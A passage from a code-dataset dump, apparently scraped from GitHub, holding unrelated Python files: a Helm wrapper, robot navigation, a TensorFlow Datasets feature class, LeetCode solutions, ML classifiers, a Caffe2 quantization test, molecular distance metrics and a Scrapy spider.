subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n\n def uninstall(self, namespace, name, wait=True, timeout='20m'):\n command = 'helm uninstall %s %s -n %s %s' % ('--wait' if wait else '',\n ('--timeout %s' % timeout) if timeout else '',\n namespace,\n name)\n subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)\n","repo_name":"CARV-ICS-FORTH/knot","sub_path":"dashboard/utils/helm.py","file_name":"helm.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"72"} +{"seq_id":"32181063614","text":"#Auteurs: Alexandre Carle et Louis-philippe Rousseau\n#Dernier changement 19 décembre 2022\n\nfrom time import sleep\nfrom Robot import Robot\nfrom Navigation import Navigation\nfrom icm20948 import ICM20948\nfrom RadioNavigation import RadioNavigation\nfrom Lidar import Lidar\nfrom Direction import Direction\n\n\nen_marche = True\n\nimu = ICM20948()\nangle = 0\nnavigation = Navigation(imu, en_marche)\nradioNavigation = RadioNavigation(en_marche)\nlidar = Lidar(en_marche)\nlidar.thread_scan_lidar.start()\nrobot = Robot(navigation , radioNavigation, lidar, en_marche)\nhas_started_turning = False\n\ntabPosition = [(6 , 0.60) , (8.20 , 0.9), (8.20, 2.20), (6.40, 2.25)]\nindex = 0\nhas_started = False\nsleep(5)\nrobot.initialiserPosition()\nwhile(en_marche):\n \n if(not has_started):\n robot.Start_Thread_Avancer(tabPosition[index][0], tabPosition[index][1])\n has_started = True\n\n if(robot.arriver_position):\n if(not has_started_turning):\n robot.Stop_Thread_Avancer()\n robot.Tourner(Direction.Gauche)\n index += 1\n has_started_turning = True\n \n ##Entrer dans cette condition quand l'angle du robot à atteint 90 degrées\n #Nous avons mis 85 degrées pour compenser les délais matériels (Si == 90, il tournait trop)\n if(navigation.angleX >= robot.angleX + 85 or navigation.angleX <= robot.angleX - 85 and has_started_turning):\n robot.Freiner()\n robot.angleX = navigation.angleX\n has_started = False\n has_started_turning = False\n \n if(index == len(tabPosition)):\n en_marche = False\n robot.Freiner()\n \nradioNavigation.en_marche = False\nlidar.en_marche = False\nnavigation.en_marche = False\nradioNavigation.thread_get_position.join()\nlidar.thread_scan_lidar.join()\nnavigation.thread_calcul_position.join()\n","repo_name":"Alex6X9X/Conception_Enviro","sub_path":"PFI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10090934442","text":"import enum\nfrom typing import Union\nimport zlib\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow_datasets.core import utils\nfrom tensorflow_datasets.core.features import feature as feature_lib\nfrom tensorflow_datasets.core.proto import feature_pb2\nfrom tensorflow_datasets.core.utils import py_utils\n\nJson = utils.Json\nShape = utils.Shape\n\n\nclass Encoding(enum.Enum):\n \"\"\"Encoding type of `tfds.features.Tensor`.\n\n For higher dimension tensors, it is recommended to define the encoding as\n zlib or bytes to save space on disk.\n\n Attributes:\n NONE: No compression (default). bools/integers will be upcasted to int64 as\n this is the only integer format supported by the\n [`tf.train.Example`](https://www.tensorflow.org/tutorials/load_data/tfrecord#tftrainexample)\n protobufs in which examples are saved.\n BYTES: Stored as raw bytes (avoid the upcasting from above).\n ZLIB: The raw bytes are compressed using zlib.\n \"\"\"\n NONE = 'none'\n BYTES = 'bytes'\n ZLIB = 'zlib'\n # Could eventually add GZIP too (as supported by `tf.io.decode_compressed`\n # but feel redundant with ZLIB.\n\n\nclass Tensor(feature_lib.FeatureConnector):\n \"\"\"`FeatureConnector` for generic data of arbitrary shape and type.\"\"\"\n\n # For backward compatibility with the `features.json` saved by\n # `FeatureConnector.save_config`\n ALIASES = ['tensorflow_datasets.core.features.feature.Tensor']\n\n def __init__(\n self,\n *,\n shape: utils.Shape,\n dtype: tf.dtypes.DType,\n # TODO(tfds): Could add an Encoding.AUTO to automatically compress\n # tensors using some heuristic. However, careful about backward\n # compatibility.\n # Would require some `DatasetInfo.api_version = 1` which would be\n # increased when triggering backward-incompatible changes.\n encoding: Union[str, Encoding] = Encoding.NONE,\n doc: feature_lib.DocArg = None,\n ):\n \"\"\"Construct a Tensor feature.\n\n Args:\n shape: Tensor shape\n dtype: Tensor dtype\n encoding: Internal encoding. See `tfds.features.Encoding` for available\n values.\n doc: Documentation of this feature (e.g. description).\n \"\"\"\n super().__init__(doc=doc)\n self._shape = tuple(shape)\n self._dtype = dtype\n if isinstance(encoding, str):\n encoding = encoding.lower()\n self._encoding = Encoding(encoding)\n\n self._encoded_to_bytes = self._encoding != Encoding.NONE\n self._dynamic_shape = self._shape.count(None) > 1\n\n if self._dtype == tf.string and self._encoded_to_bytes:\n raise NotImplementedError(\n 'tfds.features.Tensor() does not support `encoding=` when '\n 'dtype=tf.string. Please open a PR if you need this feature.')\n\n @py_utils.memoize()\n def get_tensor_info(self) -> feature_lib.TensorInfo:\n \"\"\"See base class for details.\"\"\"\n return feature_lib.TensorInfo(shape=self._shape, dtype=self._dtype)\n\n @py_utils.memoize()\n def get_serialized_info(self):\n \"\"\"See base class for details.\"\"\"\n if self._encoded_to_bytes: # Values encoded (stored as bytes)\n serialized_spec = feature_lib.TensorInfo(shape=(), dtype=tf.string)\n else:\n serialized_spec = feature_lib.TensorInfo(\n shape=self._shape,\n dtype=self._dtype,\n )\n\n # Dynamic shape, need an additional field to restore the shape after\n # de-serialization.\n if self._dynamic_shape:\n return {\n 'shape':\n feature_lib.TensorInfo(\n shape=(len(self._shape),),\n dtype=tf.int32,\n ),\n 'value':\n serialized_spec,\n }\n return serialized_spec\n\n def encode_example(self, example_data):\n \"\"\"See base class for details.\"\"\"\n # TODO(epot): Is there a better workaround ?\n # It seems some user have non-conventional use of tfds.features.Tensor where\n # they defined shape=(None, None) even if it wasn't supported.\n # For backward compatibility, the check is moved inside encode example.\n if self._dynamic_shape and not self._encoded_to_bytes:\n raise ValueError('Multiple unknown dimensions Tensor require to set '\n \"`Tensor(..., encoding='zlib')` (or 'bytes'). \"\n f'For {self}')\n\n np_dtype = np.dtype(self.numpy_dtype)\n if isinstance(example_data, tf.Tensor):\n raise TypeError(\n f'Error encoding: {example_data!r}. `_generate_examples` should '\n 'yield `np.array` compatible values, not `tf.Tensor`')\n if not isinstance(example_data, np.ndarray):\n example_data = np.array(example_data, dtype=np_dtype)\n # Ensure the shape and dtype match\n if example_data.dtype != np_dtype:\n raise ValueError('Dtype {} do not match {}'.format(\n example_data.dtype, np_dtype))\n\n shape = example_data.shape\n if isinstance(shape, tf.TensorShape):\n shape = tuple(shape.as_list())\n utils.assert_shape_match(shape, self._shape)\n\n # Eventually encode the data\n if self._encoded_to_bytes:\n example_data = example_data.tobytes()\n if self._encoding == Encoding.ZLIB:\n example_data = zlib.compress(example_data)\n\n # For dynamically shaped tensors, also save the shape (the proto\n # flatten all values so we need a way to recover the shape).\n if self._dynamic_shape:\n return {\n 'value': example_data,\n 'shape': shape,\n }\n else:\n return example_data\n\n def decode_example(self, tfexample_data):\n \"\"\"See base class for details.\"\"\"\n if self._dynamic_shape:\n value = tfexample_data['value']\n # Extract the shape (while using static values when available)\n shape = utils.merge_shape(tfexample_data['shape'], self._shape)\n else:\n value = tfexample_data\n shape = tuple(-1 if dim is None else dim for dim in self._shape)\n\n if self._encoded_to_bytes:\n if self._encoding == Encoding.ZLIB:\n value = tf.io.decode_compressed(value, compression_type='ZLIB')\n value = tf.io.decode_raw(value, self._dtype)\n value = tf.reshape(value, shape)\n\n return value\n\n def decode_batch_example(self, example_data):\n \"\"\"See base class for details.\"\"\"\n if self._dynamic_shape or self._encoded_to_bytes:\n # For Sequence(Tensor()), use `tf.map_fn` to decode/reshape individual\n # tensors.\n return super().decode_batch_example(example_data)\n else:\n # For regular tensors, `decode_example` is a no-op so can be applied\n # directly (avoid `tf.map_fn`)\n return self.decode_example(example_data)\n\n def decode_ragged_example(self, example_data):\n \"\"\"See base class for details.\"\"\"\n if self._dynamic_shape or self._encoded_to_bytes:\n # For dynamic/bytes, we need to decode individual values, so call\n # `tf.ragged.map_flat_values`\n return super().decode_ragged_example(example_data)\n else:\n # For regular tensors, `decode_example` is a no-op so can be applied\n # directly (avoid `tf.ragged.map_flat_values overhead`)\n return self.decode_example(example_data)\n\n @classmethod\n def from_json_content(\n cls, value: Union[Json, feature_pb2.TensorFeature]) -> 'Tensor':\n if isinstance(value, dict):\n return cls(\n shape=tuple(value['shape']),\n dtype=tf.dtypes.as_dtype(value['dtype']),\n # Use .get for backward-compatibility\n encoding=value.get('encoding', Encoding.NONE),\n )\n return cls(\n shape=feature_lib.from_shape_proto(value.shape),\n dtype=feature_lib.parse_dtype(value.dtype),\n encoding=value.encoding or Encoding.NONE,\n )\n\n def to_json_content(self) -> feature_pb2.TensorFeature:\n return feature_pb2.TensorFeature(\n shape=feature_lib.to_shape_proto(self._shape),\n dtype=feature_lib.encode_dtype(self._dtype),\n encoding=self._encoding.value)\n\n\ndef get_inner_feature_repr(feature):\n \"\"\"Utils which returns the object which should get printed in __repr__.\n\n This is used in container features (Sequence, FeatureDict) to print scalar\n Tensor in a less verbose way `Sequence(tf.int32)` rather than\n `Sequence(Tensor(shape=(), dtype=tf.in32))`.\n\n Args:\n feature: The feature to display\n\n Returns:\n Either the feature or it's inner value.\n \"\"\"\n # We only print `tf.int32` rather than `Tensor(shape=(), dtype=tf.int32)`\n # * For the base `Tensor` class (and not subclass).\n # * When shape is scalar (explicit check to avoid trigger when `shape=None`).\n if type(feature) == Tensor and feature.shape == (): # pylint: disable=unidiomatic-typecheck,g-explicit-bool-comparison\n return repr(feature.dtype)\n else:\n return repr(feature)\n","repo_name":"xjdlb/my-awesome-tensorlfow-tutorial","sub_path":"datasets-master/tensorflow_datasets/core/features/tensor_feature.py","file_name":"tensor_feature.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"42203715967","text":"\"\"\"\n https://leetcode-cn.com/problems/powx-n/\n https://leetcode-cn.com/problems/powx-n/solution/50-powx-n-kuai-su-mi-qing-xi-tu-jie-by-jyd/\n \n x^n --> x^10 --> (x^5)^2 --> (x*(x^2)^2)^2 = x^2 * ((x^2)^2)^2\n\"\"\"\n\n\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n if x == 0.0: return 0.0\n res = 1\n if n < 0: x, n = 1 / x, -n\n while n:\n if n & 1: res *= x\n x *= x\n n >>= 1\n return res\n\nclass Solution:\n def myPow(self, x: float, n: int) -> float:\n\n if n == 0: return 1\n \n if n < 0:\n x, n = 1/x, -n\n\n sub_re = self.myPow(x, n//2)\n if n % 2 == 1:\n res = sub_re * sub_re * x\n else:\n res = sub_re * sub_re\n return res\n\n\n","repo_name":"zhouyang412/myleetcode","sub_path":"递归/50. Pow(x, n).py","file_name":"50. Pow(x, n).py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11866232036","text":"import openalea.container\nfrom openalea.deploy.shared_data import shared_data\n#~ data_files = shared_data(openalea.container, pattern='*.inr.gz') # return a list\n\n# -- We load the images corresponding to the different time points\nfrom openalea.image.serial.basics import imread\nt1 = imread(shared_data(openalea.container, 'p58-t1_imgSeg_cleaned.inr.gz'))\nt2 = imread(shared_data(openalea.container, 'p58-t2_imgSeg_cleaned.inr.gz'))\nt3 = imread(shared_data(openalea.container, 'p58-t3_imgSeg_cleaned.inr.gz'))\n\n# -- We create the corresponding SpatialImageAnalysis objets\nfrom openalea.image.algo.analysis import SpatialImageAnalysis, DICT\nanalysis1 = SpatialImageAnalysis(t1, ignoredlabels = [0,1], return_type = DICT)\nanalysis2 = SpatialImageAnalysis(t2, ignoredlabels = [0,1], return_type = DICT)\nanalysis3 = SpatialImageAnalysis(t3, ignoredlabels = [0,1], return_type = DICT)\n\n# -- We don't want to compute values (in `graph_from_image()`) for cells at the margins of the stack.\nanalysis1.add2ignoredlabels( analysis1.cells_in_image_margins() )\nanalysis2.add2ignoredlabels( analysis2.cells_in_image_margins() )\nanalysis3.add2ignoredlabels( analysis3.cells_in_image_margins() )\n\n# -- We now create the PropertyGraphs:\n# - Note:\n# - labels added to the 'ignoredlabels' list are automatically excluded from list creation.\n# - you can specify a list of labels to work with for each graph to create.\nfrom openalea.image.algo.graph_from_image import graph_from_image\ngraph_1 = graph_from_image( analysis1 )\ngraph_2 = graph_from_image( analysis2 )\ngraph_3 = graph_from_image( analysis3 )\n# - The PropertyGraphs will contains these properties by default:\n#~ default_properties2D = ['barycenter','boundingbox','border','L1','epidermis_surface','inertia_axis']\n#~ default_properties3D = ['volume','barycenter','boundingbox','border','L1','epidermis_surface','wall_surface','inertia_axis']\n\n# -- Now you need the lineage information:\nfrom vplants.mars_alt.alt.mapping import lineage_from_file\n\nlin_12=lineage_from_file(shared_data(openalea.container, 'suiviExpertEntier58-12.txt'))\nl12=lin_12\nlin_23=lineage_from_file(shared_data(openalea.container, 'suiviExpertEntier58-23.txt'))\nl23=lin_23\n\n# --Finally you can create a TemporalPropertyGraph by temporaly linking PropertyGraph:\nfrom openalea.container import TemporalPropertyGraph\ng = TemporalPropertyGraph()\ng.extend([graph_1,graph_2,graph_3],[l12,l23], [0,24,48])\n\n# -- If you want to save this TemporalPropertyGraph:\nimport pickle\nimport gzip\nf = gzip.open('p58_TemporalPropertyGraphs.pklz','w')\npickle.dump( g, f)\nf.close()\n\n","repo_name":"jldinh/vplants","sub_path":"vtissue/imaging/tissue_analysis/doc/user/tutorial_TemporalPropertyGraph_creation.py","file_name":"tutorial_TemporalPropertyGraph_creation.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14949109404","text":"from main import *\nLRpclf = Pipeline([\n ('vect', CountVectorizer(max_df=0.5, ngram_range=(1,2))),\n ('tfidf', TfidfTransformer(norm='l2')),\n ('clf', LogisticRegression()),\n])\n\nLRpclf.fit(X_train, y_train)\ny_pred_lr_val = LRpclf.predict(X_validation)\ny_pred_lr_test = LRpclf.predict(test_data_clean)\nwith open('submissionLR.csv', 'w') as f:\n writer = csv.writer(f)\n writer.writerow((\"Id\", \"Category\"))\n writer.writerows(zip(test_files_ids, y_pred_lr_test))\n\ndisplay_results(y_validation, y_pred_lr_val)\n\n# 89.66%\n","repo_name":"parthkhanna150/IMDB_Sentiment","sub_path":"log_reg.py","file_name":"log_reg.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14817495779","text":"\n\nimport collections\n\nimport caffe2.python.hypothesis_test_util as hu\nimport hypothesis.strategies as st\nimport numpy as np\nfrom caffe2.python import core, dyndep, workspace\nfrom caffe2.quantization.server.dnnlowp_test_utils import check_quantized_results_close\nfrom hypothesis import given, settings\n\n\ndyndep.InitOpsLibrary(\"//caffe2/caffe2/quantization/server:dnnlowp_ops\")\nworkspace.GlobalInit([\"caffe2\", \"--caffe2_omp_num_threads=11\"])\n\n\nclass DNNLowPMulOpTest(hu.HypothesisTestCase):\n @given(\n N=st.integers(32, 256),\n is_empty=st.booleans(),\n in_quantized=st.booleans(),\n out_quantized=st.booleans(),\n in_place=st.sampled_from([(False, False), (True, False), (False, True)]),\n **hu.gcs_cpu_only\n )\n @settings(deadline=None)\n def test_dnnlowp_elementwise_mul_int(\n self, N, is_empty, in_quantized, out_quantized, in_place, gc, dc\n ):\n if is_empty:\n N = 0\n # FIXME: DNNLOWP Mul doesn't support inplace operation and\n # dequantize_output=1 at the same time\n if in_place[0] or in_place[1]:\n in_quantized = True\n out_quantized = True\n\n # All inputs have scale 1, so exactly represented after quantization\n min_ = -100\n max_ = min_ + 255\n A = np.round(np.random.rand(N) * (max_ - min_) + min_)\n A = A.astype(np.float32)\n if N != 0:\n A[0] = min_\n A[1] = max_\n\n B = np.round(np.random.rand(N) * 255 - 128).astype(np.float32)\n if N != 0:\n B[0] = -128\n B[1] = 127\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"engine\"])\n outputs = []\n\n engine_list = [\"\", \"DNNLOWP\"]\n for engine in engine_list:\n net = core.Net(\"test_net\")\n\n do_quantize = \"DNNLOWP\" in engine and in_quantized\n do_dequantize = \"DNNLOWP\" in engine and out_quantized\n\n if do_quantize:\n quantize_A = core.CreateOperator(\n \"Quantize\", [\"A\"], [\"A_q\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([quantize_A])\n\n quantize_B = core.CreateOperator(\n \"Quantize\", [\"B\"], [\"B_q\"], engine=engine, device_option=gc\n )\n net.Proto().op.extend([quantize_B])\n\n out = \"Y\"\n if in_place[0]:\n out = \"A\"\n elif in_place[1]:\n out = \"B\"\n\n mul = core.CreateOperator(\n \"Mul\",\n [\"A_q\", \"B_q\"] if do_quantize else [\"A\", \"B\"],\n [(out + \"_q\") if do_dequantize else out],\n dequantize_output=not do_dequantize,\n engine=engine,\n device_option=gc,\n )\n net.Proto().op.extend([mul])\n\n if do_dequantize:\n dequantize = core.CreateOperator(\n \"Dequantize\", [out + \"_q\"], [out], engine=engine, device_option=gc\n )\n net.Proto().op.extend([dequantize])\n\n self.ws.create_blob(\"A\").feed(A, device_option=gc)\n self.ws.create_blob(\"B\").feed(B, device_option=gc)\n self.ws.run(net)\n outputs.append(Output(Y=self.ws.blobs[out].fetch(), engine=engine))\n\n check_quantized_results_close(outputs)\n\n @given(**hu.gcs_cpu_only)\n @settings(deadline=None)\n def test_dnnlowp_elementwise_mul_broadcast(self, gc, dc):\n # Set broadcast and no axis, i.e. broadcasting last dimensions.\n min_ = -100\n max_ = min_ + 255\n A = np.round(np.random.rand(2, 3, 4, 5) * (max_ - min_) + min_)\n A = A.astype(np.float32)\n A[0, 0, 0, 0] = min_\n A[0, 0, 0, 1] = max_\n\n B = np.round(np.random.rand(4, 5) * 255 - 128).astype(np.float32)\n B[0, 0] = -128\n B[0, 1] = 127\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"engine\"])\n outputs = []\n\n engine_list = [\"\", \"DNNLOWP\"]\n for engine in engine_list:\n net = core.Net(\"test_net\")\n\n mul = core.CreateOperator(\n \"Mul\",\n [\"A\", \"B\"],\n [\"Y\"],\n engine=engine,\n device_option=gc,\n broadcast=1,\n dequantize_output=1,\n )\n net.Proto().op.extend([mul])\n\n self.ws.create_blob(\"A\").feed(A, device_option=gc)\n self.ws.create_blob(\"B\").feed(B, device_option=gc)\n self.ws.run(net)\n outputs.append(Output(Y=self.ws.blobs[\"Y\"].fetch(), engine=engine))\n\n check_quantized_results_close(outputs)\n\n @given(**hu.gcs_cpu_only)\n @settings(deadline=None)\n def test_dnnlowp_elementwise_mul_broadcast_axis(self, gc, dc):\n for bdim, axis in [\n ((3, 4), 1), # broadcasting intermediate dimensions\n ((2,), 0), # broadcasting the first dimension\n ((1, 4, 1), 1),\n ]:\n # broadcasting with single elem dimensions at both ends\n\n min_ = -100\n max_ = min_ + 255\n A = np.round(np.random.rand(2, 3, 4, 5) * (max_ - min_) + min_)\n A = A.astype(np.float32)\n\n B = np.round(np.random.rand(*bdim) * 255 - 128).astype(np.float32)\n\n A.flat[0] = min_\n A.flat[1] = max_\n B.flat[0] = -128\n B.flat[1] = 127\n\n Output = collections.namedtuple(\"Output\", [\"Y\", \"engine\"])\n outputs = []\n\n engine_list = [\"\", \"DNNLOWP\"]\n for engine in engine_list:\n net = core.Net(\"test_net\")\n\n mul = core.CreateOperator(\n \"Mul\",\n [\"A\", \"B\"],\n [\"Y\"],\n engine=engine,\n device_option=gc,\n broadcast=1,\n axis=axis,\n dequantize_output=1,\n )\n net.Proto().op.extend([mul])\n\n self.ws.create_blob(\"A\").feed(A, device_option=gc)\n self.ws.create_blob(\"B\").feed(B, device_option=gc)\n self.ws.run(net)\n outputs.append(Output(Y=self.ws.blobs[\"Y\"].fetch(), engine=engine))\n\n check_quantized_results_close(outputs)\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/quantization/server/elementwise_mul_dnnlowp_op_test.py","file_name":"elementwise_mul_dnnlowp_op_test.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"11465763667","text":"\"\"\"Distance metrics for compounds: Tanimoto and maximum common substructure (MCS)\"\"\"\n\nimport itertools\nimport multiprocessing\n\nfrom rdkit import DataStructs\nfrom rdkit.Chem.rdFMCS import FindMCS # pylint: disable=no-name-in-module\nfrom scipy.spatial.distance import squareform # pylint: disable=unused-import\nimport numpy as np\nN_PROCS = multiprocessing.cpu_count()\n\n\ndef _parallel_dist_single(inp_lst, worker_fn):\n \"\"\"Method for multiprocessor distance matrix computation.\"\"\"\n pool = multiprocessing.Pool(processes=N_PROCS)\n inputs = [[k] + inp_lst for k, _ in enumerate(inp_lst[0])]\n ret = pool.starmap(worker_fn, inputs)\n pool.close()\n pool.join()\n\n dists_all = []\n sum_incomp = 0\n for r in ret:\n dists_all.append(r[0])\n sum_incomp += r[1]\n\n # Flattened distance matrix (upper triangle only)\n dists = np.array(list(itertools.chain.from_iterable(dists_all)))\n return squareform(dists), sum_incomp\n\ndef _parallel_dist_multi(inp_lst, worker_fn):\n \"\"\"Method for multiprocessor distance matrix computation.\"\"\"\n pool = multiprocessing.Pool(processes=N_PROCS)\n #TODO: Want to switch order of fps1 and 2?\n inputs = [[inp_lst[0][k]] + inp_lst[1:] for k, _ in enumerate(inp_lst[0])]\n ret = pool.starmap(worker_fn, inputs)\n pool.close()\n pool.join()\n\n dists_all = []\n sum_incomp = 0\n for r in ret:\n dists_all.append(r[0])\n sum_incomp += r[1]\n return np.asarray(dists_all), sum_incomp\n\ndef _tanimoto_worker(k, fps):\n \"\"\"Get per-fingerprint Tanimoto distance vector.\"\"\"\n # pylint: disable=no-member\n sims = DataStructs.BulkTanimotoSimilarity(fps[k], fps[(k + 1):])\n dists_k = [1. - s for s in sims]\n return np.array(dists_k), 0\n\ndef tanimoto_single(fp, fps):\n \"\"\"\n Compute a vector of Tanimoto distances between a single fingerprint and each fingerprint in a list .\n\n Args:\n fp : Fingerprint to be compared.\n\n fps (Sequence): List of ECFP fingerprint vectors.\n\n Returns:\n np.ndarray: Vector of distances between fp and each fingerprint in fps.\n\n \"\"\"\n # pylint: disable=no-member\n sims = DataStructs.BulkTanimotoSimilarity(fp, fps)\n dists = [1. - s for s in sims]\n return np.array(dists), 0\n\ndef tanimoto(fps1, fps2=None):\n \"\"\"\n Compute Tanimoto distances between sets of ECFP fingerprints.\n\n Args:\n fps1 (Sequence): First list of ECFP fingerprint vectors.\n\n fps2 (Sequence, optional): Second list of ECFP fingerprint vectors.\n If not provided, computes distances between pairs of fingerprints in fps1.\n Otherwise, computes a matrix of distances between pairs of fingerprints in fps1 and fps2.\n\n Returns:\n np.ndarray: Matrix of pairwise distances between fingerprints.\n \"\"\"\n if fps2 is None:\n dists, _ = _parallel_dist_single([fps1], _tanimoto_worker)\n else:\n dists, _ = _parallel_dist_multi([fps1, fps2], tanimoto_single)\n return dists\n\n\ndef _mcs_worker(k, mols, n_atms):\n \"\"\"Get per-molecule MCS distance vector.\"\"\"\n dists_k = []\n n_incomp = 0 # Number of searches terminated before timeout\n for l in range(k + 1, len(mols)):\n # Set timeout to halt exhaustive search, which could take minutes\n result = FindMCS([mols[k], mols[l]], completeRingsOnly=True,\n ringMatchesRingOnly=True, timeout=10)\n dists_k.append(1. - result.numAtoms /\n ((n_atms[k] + n_atms[l]) / 2))\n if result.canceled:\n n_incomp += 1\n return np.array(dists_k), n_incomp\n\ndef _mcs_single(mol, mols, n_atms):\n \"\"\"Get per-molecule MCS distance vector.\"\"\"\n dists_k = []\n n_atm = float(mol.GetNumAtoms())\n n_incomp = 0 # Number of searches terminated before timeout\n for l in range(0, len(mols)):\n # Set timeout to halt exhaustive search, which could take minutes\n result = FindMCS([mol, mols[l]], completeRingsOnly=True,\n ringMatchesRingOnly=True, timeout=10)\n dists_k.append(1. - result.numAtoms /\n ((n_atm + n_atms[l]) / 2))\n if result.canceled:\n n_incomp += 1\n return np.array(dists_k), n_incomp\n\ndef mcs(mols1, mols2=None):\n \"\"\"\n Computes maximum common substructure (MCS) distances between pairs of molecules.\n\n The MCS distance between molecules m1 and m2 is one minus the average of fMCS(m1,m2) and fMCS(m2,m1),\n where fMCS(m1,m2) is the fraction of m1's atoms that are part of the largest common substructure of m1 and m2.\n\n Args:\n mols1 (Sequence of `rdkit.Mol`): First list of molecules.\n\n mols2 (Sequence of `rdkit.Mol`, optional): Second list of molecules.\n If not provided, computes MCS distances between pairs of molecules in mols1.\n Otherwise, computes a matrix of distances between pairs of molecules from mols1 and mols2.\n\n Returns:\n np.ndarray: Matrix of pairwise distances between molecules.\n\n \"\"\"\n\n n_atms1 = [float(m.GetNumAtoms()) for m in mols1]\n if mols2 is None:\n dists, sum_incomplete = _parallel_dist_single([mols1, n_atms1], _mcs_worker)\n else:\n dists, sum_incomplete = _parallel_dist_multi([mols1, mols2, n_atms1], _mcs_single)\n if sum_incomplete:\n print('{} incomplete MCS searches'.format(sum_incomplete))\n return dists\n\n\nif __name__ == '__main__':\n # Start a server process, which parent forks for child processes\n multiprocessing.set_start_method('forkserver')\n","repo_name":"ATOMScience-org/AMPL","sub_path":"atomsci/ddm/pipeline/dist_metrics.py","file_name":"dist_metrics.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"72"} +{"seq_id":"34842460850","text":"def solution(queue1, queue2):\n answer = -1\n left = sum(queue1)\n right = sum(queue2)\n target = (left+right)//2\n i, j, t = 0, 0, len(queue1)\n if not ((left+right) % 2):\n while i < 2*t and j < 2*t:\n if left < target:\n left += queue2[j]\n right -= queue2[j]\n queue1.append(queue2[j])\n j += 1\n elif left > target:\n left -= queue1[i]\n right += queue1[i]\n queue2.append(queue1[i])\n i += 1\n else:\n answer = i + j\n break\n \n return answer\n\nprint(solution([1,4], [4,8]))","repo_name":"AndreaStudy/PythonAlgo","sub_path":"programmers/두큐합같게만들기/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9497584999","text":"import json\n\nimport scrapy\nfrom scrapy.http.response.html import HtmlResponse\n\nfrom .Base import BaseSpider\n\n\nclass YY18(BaseSpider):\n name = \"YY18\"\n base_link = ''\n\n def start_requests(self):\n # 初始页\n urls = [\n 'http://ybj.fujian.gov.cn/was5/web/search?channelid=294271&templet=advsch.jsp&sortfield=-docorderpri%2C-docreltime&classsql=chnlid%3D35207&prepage=150&page=1',\n ]\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse, meta={'page': 1})\n\n def parse(self, response: HtmlResponse):\n # 解析列表页\n datas = json.loads(response.text.replace('\\n', '').replace('\\r', '').replace(' ', ''))\n\n if datas['docs'][0]['title'] == '文章标题':\n return\n\n # 解析列表页\n for data in datas['docs']:\n if data['title'] == '文章标题':\n continue\n self.count += 1\n print(self.count)\n save = {}\n save['title'] = data['title']\n save['release_date'] = data['pubtime']\n save['mainbody'] = data['content']\n save['mainbody_table'] = data['title']\n save['annex_link'] = f'http://ybj.fujian.gov.cn/ztzl/yxcg/ggtz/{data[\"file\"]}'\n save['annex_title'] = data['filedesc']\n save['tag'] = int(self.name.replace('YY', ''))\n save['ori_url'] = data['url']\n yield save\n next_page = response.meta['page'] + 1\n yield scrapy.Request(\n url=f'http://ybj.fujian.gov.cn/was5/web/search?channelid=294271&templet=advsch.jsp&sortfield=-docorderpri%2C-docreltime&classsql=chnlid%3D35207&prepage=150&page={next_page}',\n callback=self.parse, meta={'page': next_page})\n","repo_name":"Medical-Knowledge-Atlas/SpiderMan","sub_path":"SpiderMan/medical/YY18.py","file_name":"YY18.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26069946011","text":"import pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\nurl = (\n 'https://raw.githubusercontent.com/prasertcbs/basic-dataset/master/iris.csv'\n)\ndf = pd.read_csv(url)\nprint(df.head())\nprint(df.info())\nprint(df.columns)\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import metrics\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\n\nx_train, x_test, y_train, y_test =train_test_split(df[['sepal_length','sepal_width','petal_length','petal_width']], df.species,test_size=0.3,random_state=7)\n# #Step 1:choose model\n# model=KNeighborsClassifier()\n# #Step2 : fit model\n# model.fit(x_train, y_train)\n# #step3:predict\n# y_pre=model.predict(x_test)\n# #step4 :Score\n# print(model.score(x_test, y_test ))\n\n# #Step 1:choose model\n# model=LogisticRegression()\n# #Step2 : fit model\n# model.fit(x_train, y_train)\n# #step3:predict\n# y_pre=model.predict(x_test)\n# #step4 :Score\n# print(model.score(x_test, y_test ))\n\n# #Step 1:choose model\n# model = GaussianNB()\n# #Step2 : fit model\n# model.fit(x_train, y_train)\n# #step3:predict\n# y_pre=model.predict(x_test)\n# #step4 :Score\n# print(model.score(x_test, y_test ))\n\nalgo = [[KNeighborsClassifier(), 'KNeighborsClassifier'],\n [LogisticRegression(solver='lbfgs'), 'LogisticRegression'],\n [GaussianNB(), 